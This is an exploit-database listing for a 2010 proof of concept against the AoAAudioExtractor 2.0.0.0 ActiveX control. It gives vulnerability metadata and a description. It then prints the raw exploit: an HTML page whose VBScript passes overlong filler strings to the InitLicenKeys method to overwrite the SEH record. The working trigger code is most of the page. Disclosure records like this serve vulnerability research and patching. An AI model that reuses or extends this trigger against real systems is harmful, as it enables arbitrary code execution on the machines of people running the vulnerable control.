header-logo
Suggest Exploit
vendor:
AoAAudioExtractor
by:
Hadji Samir
9,3
CVSS
HIGH
SEH
119
CWE
Product Name: AoAAudioExtractor
Affected Version From: 2.0.0.0
Affected Version To: 2.0.0.0
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2 FR / IE6
2010

AoAAudioExtractor 2.0.0.0 ActiveX PoC (SEH)

This exploit is for AoAAudioExtractor 2.0.0.0 ActiveX. It is a proof of concept exploit that uses a string of 2048 'A' characters, followed by 4 'B' characters, 4 'C' characters, 100 'D' characters, and 100 'E' characters as arguments to the InitLicenKeys method of the ActiveX control. This causes a SEH overwrite, allowing arbitrary code execution.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

<html>

<object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' ></object>
<script language='vbscript'>

'AoAAudioExtractor 2.0.0.0 ActiveX PoC (SEH)
' Author:    Hadji Samir ,s-dz@hotmail.fr  
' Tested on: Windows XP SP2 FR / IE6  
' Down:      http://www.aoamedia.com/audioextractor.exe
' Date:      2010-08-09
'samir tjrs mahboul-3lik

arg1=String(2048, "A")
nseh=String(4, "B")
seh=String(4, "C")
arg4=String(100, "D")
arg5=String(100, "E")

target.InitLicenKeys arg1 ,nseh ,seh ,arg4 ,arg5 
</script>


hadji samir

Navigation

Suggest Exploit

Services By CQR